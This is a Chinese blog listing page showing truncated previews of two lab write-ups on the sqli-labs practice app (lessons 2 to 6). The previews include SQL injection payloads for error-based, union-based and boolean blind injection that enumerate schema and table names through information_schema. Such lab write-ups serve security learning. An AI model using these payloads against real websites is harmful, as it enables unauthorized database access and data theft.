靶场
。
幻无邪_zxy
社畜
展开
-
sql-lib less5-6
less-5第一步:http://localhost/sqli/Less-5/?id=1’ 得到错误’1’’因此单引号闭合使用order by http://localhost/sqli/Less-5/?id=1’ order by 3–+得到字段数为3第二步:页面没有回显,进行bool盲注测试爆破数据库:?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1原创 2020-08-07 16:40:35 · 244 阅读 · 0 评论 -
sql-lib-Less2-4
知识点总结:16进制 : 0x3a%20 空格order by判断字段数利用union select 联合查询(默认只会返回第一个结果,所以改为0用于爆破),获取表名,group_concat()连接字符串0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+查询字段名0’ union select 1,gro原创 2020-07-28 23:36:25 · 209 阅读 · 0 评论